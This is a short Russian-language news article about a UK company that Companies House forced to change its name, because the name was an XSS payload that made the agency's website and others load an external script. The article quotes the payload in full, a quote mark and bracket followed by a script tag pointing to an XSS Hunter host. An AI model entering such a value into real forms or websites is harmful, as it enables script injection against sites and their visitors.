Британскую компанию заставили сменить название — оно провоцировало атаки на сайты
Регистрационная палата Великобритании обязала одну из местных компаний провести ребрендинг, потому что её наименование ставило под угрозу безопасность некоторых сайтов, включая ресурс самого учреждения, сообщает The Guardian.
Консалтинговую компанию «“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD» основал британский разработчик — название казалось ему забавным и, как он думал, будет способствовать развитию бизнеса.
Позже было установлено, что имя делало сайт Регистрационной палаты уязвимым к XSS-атакам (межсайтовый скриптинг). В ходе таких атак хакеры могут внедрять в веб-страницы вредоносный код, выполняющийся на пользовательском устройстве при открытии страницы.
Сайты, которые некорректно обрабатывают HTML-код, из-за первых двух символов “ и > названия по ошибке считали его пустым. Далее они загружали и выполняли скрипт с платформы XSS Hunter, которая помогает разработчикам искать XSS-уязвимости.
Скрипт выводил безобидное уведомление. Но сама возможность его появления говорит о том, ошибку могут эксплуатировать киберпреступники, чтобы нанести более серьёзный ущерб.
По словам основателя компании, пожелавшего остаться анонимным, кавычки и угловые скобки допускаются нормами агентства и встречаются в других шутливых наименованиях компаний. Поэтому он думал, что его название не станет проблемой, а агентство предприняло меры для предотвращения подобных инцидентов.
Компания уже получила новое имя: теперь она называется «THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD» (Компания, в названии которой были HTML-теги).
Релоцировались? Теперь вы можете комментировать без верификации аккаунта.